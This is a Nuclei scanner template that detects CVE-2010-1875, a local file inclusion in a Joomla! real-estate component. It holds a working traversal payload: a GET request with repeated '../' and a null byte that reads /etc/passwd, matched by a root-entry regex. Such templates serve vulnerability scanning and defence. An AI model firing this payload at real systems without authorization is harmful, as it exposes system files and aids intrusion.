my-nuclei-templates/CVE-2010-1875.yaml

31 lines
1.0 KiB
YAML
Raw Permalink Normal View History

2021-09-02 08:03:02 +00:00
id: CVE-2010-1875
info:
name: Joomla! Component Property - Local File Inclusion
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
2021-09-02 08:03:02 +00:00
reference:
- https://www.exploit-db.com/exploits/11851
- https://www.cvedetails.com/cve/CVE-2010-1875
2022-06-18 08:05:25 +00:00
- http://secunia.com/advisories/39074
- http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/
classification:
cve-id: CVE-2010-1875
2021-09-02 08:03:02 +00:00
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-09-02 08:03:02 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/03/16